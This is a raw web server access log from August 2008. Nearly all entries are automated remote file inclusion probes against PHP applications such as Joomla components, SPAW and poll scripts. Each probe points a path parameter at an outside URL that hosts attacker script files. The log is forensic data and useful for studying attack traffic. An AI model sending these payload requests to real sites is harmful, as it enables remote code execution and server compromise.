211.202.2.15 - - [30/Aug/2008:00:00:41 -0400] "GET /logs/error_log.Q108071900/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.202.2.15 - - [30/Aug/2008:00:00:42 -0400] "GET /errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.202.2.15 - - [30/Aug/2008:00:00:42 -0400] "GET /logs/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.202.2.15 - - [30/Aug/2008:00:00:43 -0400] "GET /logs/access_log.Q108072300/errors.php?error=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.202.2.15 - - [30/Aug/2008:00:01:09 -0400] "GET /logs/error_log.Q108071900//index.php?DOCUMENT_ROOT=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.202.2.15 - - [30/Aug/2008:00:01:10 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.202.2.15 - - [30/Aug/2008:00:01:10 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.202.2.15 - - [30/Aug/2008:00:01:11 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
66.98.192.98 - - [30/Aug/2008:00:01:25 -0400] "GET /logs/error_log.Q108081300//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
66.98.192.98 - - [30/Aug/2008:00:01:25 -0400] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
66.98.192.98 - - [30/Aug/2008:00:01:25 -0400] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
193.26.13.170 - - [30/Aug/2008:00:01:31 -0400] "GET /logs/access_log.Q108071500//admin/business_inc/saveserver.php?thisdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:01:31 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
66.98.192.98 - - [30/Aug/2008:00:01:32 -0400] "GET /logs/access_log.Q108081300//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
193.26.13.170 - - [30/Aug/2008:00:01:32 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
66.135.38.88 - - [30/Aug/2008:00:01:46 -0400] "GET /logs/error_log.Q108081300//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.811"
66.135.38.88 - - [30/Aug/2008:00:01:47 -0400] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
66.135.38.88 - - [30/Aug/2008:00:01:47 -0400] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
193.26.13.170 - - [30/Aug/2008:00:01:49 -0400] "GET /logs/error_log.Q108062900//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:01:53 -0400] "GET /logs/error_log.Q108051800//admin/business_inc/saveserver.php?thisdir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:01:54 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:01:54 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:02:01 -0400] "GET /logs/error_log.Q108072800//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
66.135.38.88 - - [30/Aug/2008:00:02:11 -0400] "GET /logs/access_log.Q108081300//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 282 "-" "libwww-perl/5.811"
209.59.12.99 - - [30/Aug/2008:00:02:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.68.35.77 - - [30/Aug/2008:00:02:57 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?http://www.donath.de/files/safeon.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
82.80.255.26 - - [30/Aug/2008:00:03:37 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
82.80.255.26 - - [30/Aug/2008:00:03:37 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
82.80.255.26 - - [30/Aug/2008:00:03:37 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
82.80.255.26 - - [30/Aug/2008:00:03:38 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
200.68.35.77 - - [30/Aug/2008:00:04:22 -0400] "GET /logs/access_log.Q108080800/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.donath.de/files/safeon.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
200.68.35.77 - - [30/Aug/2008:00:04:22 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.donath.de/files/safeon.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
200.68.35.77 - - [30/Aug/2008:00:04:23 -0400] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.donath.de/files/safeon.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
64.185.237.143 - - [30/Aug/2008:00:04:30 -0400] "GET /logs/error_log.Q108081300//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.812"
64.185.237.143 - - [30/Aug/2008:00:04:30 -0400] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.812"
64.185.237.143 - - [30/Aug/2008:00:04:30 -0400] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.812"
64.185.237.143 - - [30/Aug/2008:00:04:32 -0400] "GET /logs/error_log.Q108081300//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.812"
64.185.237.143 - - [30/Aug/2008:00:04:32 -0400] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.812"
64.185.237.143 - - [30/Aug/2008:00:04:32 -0400] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.812"
64.185.237.143 - - [30/Aug/2008:00:04:38 -0400] "GET /logs/access_log.Q108081300//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.812"
64.185.237.143 - - [30/Aug/2008:00:04:38 -0400] "GET /logs/access_log.Q108081300//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.812"
200.68.35.77 - - [30/Aug/2008:00:04:42 -0400] "GET /logs/access_log.Q108080300/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.donath.de/files/safeon.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
200.53.114.42 - - [30/Aug/2008:00:05:12 -0400] "GET /logs/error_log.Q108081300//doceboCms/class/class.dashboard_cms.php?where_framework=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.76"
66.135.38.88 - - [30/Aug/2008:00:05:15 -0400] "GET /logs/error_log.Q108081300//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.811"
66.135.38.88 - - [30/Aug/2008:00:05:15 -0400] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
66.135.38.88 - - [30/Aug/2008:00:05:18 -0400] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
66.135.38.88 - - [30/Aug/2008:00:05:39 -0400] "GET /logs/access_log.Q108081300//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.811"
200.53.114.42 - - [30/Aug/2008:00:06:02 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:06:02 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:06:13 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.76"
74.6.8.96 - - [30/Aug/2008:00:06:10 -0400] "GET /logs/error_log.Q108052000 HTTP/1.0" 200 427874 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.207.106.54 - - [30/Aug/2008:00:07:06 -0400] "GET /logs/error_log.Q108081300//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
193.207.106.54 - - [30/Aug/2008:00:07:06 -0400] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
193.207.106.54 - - [30/Aug/2008:00:07:06 -0400] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
193.207.106.54 - - [30/Aug/2008:00:07:16 -0400] "GET /logs/access_log.Q108081300//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
209.59.12.99 - - [30/Aug/2008:00:07:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.5.127.5 - - [30/Aug/2008:00:07:51 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
203.5.127.5 - - [30/Aug/2008:00:07:56 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
66.249.71.144 - - [30/Aug/2008:00:08:27 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L4F19932678041300A3C807D+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.108.66.188 - - [30/Aug/2008:00:08:44 -0400] "GET /logs/error_log.Q108081500/show_news.php?cutepath=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.812"
62.210.139.66 - - [30/Aug/2008:00:08:47 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.210.139.66 - - [30/Aug/2008:00:08:48 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.210.139.66 - - [30/Aug/2008:00:08:48 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.210.139.66 - - [30/Aug/2008:00:08:48 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.210.139.66 - - [30/Aug/2008:00:08:49 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.210.139.66 - - [30/Aug/2008:00:08:49 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.6.7 - - [30/Aug/2008:00:08:49 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.6.7 - - [30/Aug/2008:00:08:49 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
75.127.70.16 - - [30/Aug/2008:00:08:50 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
75.127.70.16 - - [30/Aug/2008:00:08:50 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.53.114.42 - - [30/Aug/2008:00:09:17 -0400] "GET /logs/access_log.Q108070500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
85.17.6.7 - - [30/Aug/2008:00:09:26 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
85.17.6.7 - - [30/Aug/2008:00:09:26 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
85.17.6.7 - - [30/Aug/2008:00:09:26 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
64.185.237.47 - - [30/Aug/2008:00:09:27 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.185.237.47 - - [30/Aug/2008:00:09:27 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.185.237.47 - - [30/Aug/2008:00:09:27 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.185.237.47 - - [30/Aug/2008:00:09:27 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.185.237.47 - - [30/Aug/2008:00:09:27 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.185.237.47 - - [30/Aug/2008:00:09:28 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.53.114.42 - - [30/Aug/2008:00:09:30 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
89.248.110.152 - - [30/Aug/2008:00:09:30 -0400] "GET //poll/booth.php?include_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
89.248.110.152 - - [30/Aug/2008:00:09:30 -0400] "GET /logs/error_log.Q108070900//poll/booth.php?include_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
200.53.114.42 - - [30/Aug/2008:00:09:30 -0400] "GET /logs/error_log.Q108070500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
89.248.110.152 - - [30/Aug/2008:00:09:31 -0400] "GET /logs/access_log.Q108070900//poll/booth.php?include_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
89.248.110.152 - - [30/Aug/2008:00:09:33 -0400] "GET /logs//poll/booth.php?include_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
75.127.70.16 - - [30/Aug/2008:00:09:44 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
75.127.70.16 - - [30/Aug/2008:00:09:44 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
75.127.70.16 - - [30/Aug/2008:00:09:44 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
62.210.139.66 - - [30/Aug/2008:00:09:57 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.185.237.47 - - [30/Aug/2008:00:09:58 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
64.185.237.47 - - [30/Aug/2008:00:09:58 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
64.185.237.47 - - [30/Aug/2008:00:09:58 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
64.185.237.47 - - [30/Aug/2008:00:09:59 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
64.185.237.47 - - [30/Aug/2008:00:09:59 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
64.185.237.47 - - [30/Aug/2008:00:09:59 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
64.185.237.47 - - [30/Aug/2008:00:10:00 -0400] "GET /logs/error_log.Q108062500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
64.185.237.47 - - [30/Aug/2008:00:10:00 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
64.185.237.47 - - [30/Aug/2008:00:10:01 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
62.210.139.66 - - [30/Aug/2008:00:10:04 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.210.139.66 - - [30/Aug/2008:00:10:07 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.6.7 - - [30/Aug/2008:00:10:09 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
75.127.70.16 - - [30/Aug/2008:00:10:38 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.185.237.47 - - [30/Aug/2008:00:10:53 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
72.9.246.218 - - [30/Aug/2008:00:10:53 -0400] "GET /logs/error_log.Q108070900//poll/booth.php?include_path=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
72.9.246.218 - - [30/Aug/2008:00:10:53 -0400] "GET //poll/booth.php?include_path=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
72.9.246.218 - - [30/Aug/2008:00:10:53 -0400] "GET /logs//poll/booth.php?include_path=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.811"
64.185.237.47 - - [30/Aug/2008:00:10:54 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.185.237.47 - - [30/Aug/2008:00:10:56 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
72.9.246.218 - - [30/Aug/2008:00:10:58 -0400] "GET /logs/error_log.Q108070900//poll/booth.php?include_path=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
89.111.176.116 - - [30/Aug/2008:00:10:58 -0400] "GET /logs/error_log.Q108081300/modules/My_eGallery/index.php?basepath=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
72.9.246.218 - - [30/Aug/2008:00:10:58 -0400] "GET //poll/booth.php?include_path=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
72.9.246.218 - - [30/Aug/2008:00:10:59 -0400] "GET /logs//poll/booth.php?include_path=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.811"
89.111.176.116 - - [30/Aug/2008:00:10:59 -0400] "GET /modules/My_eGallery/index.php?basepath=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
89.111.176.116 - - [30/Aug/2008:00:10:59 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
72.9.246.218 - - [30/Aug/2008:00:11:34 -0400] "GET /logs/access_log.Q108070900//poll/booth.php?include_path=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
85.17.6.7 - - [30/Aug/2008:00:11:44 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
72.9.246.218 - - [30/Aug/2008:00:11:45 -0400] "GET /logs/access_log.Q108070900//poll/booth.php?include_path=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
89.111.176.116 - - [30/Aug/2008:00:11:53 -0400] "GET /logs/error_log.Q108042500//modules/vwar/admin/admin.php?vwar_root=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
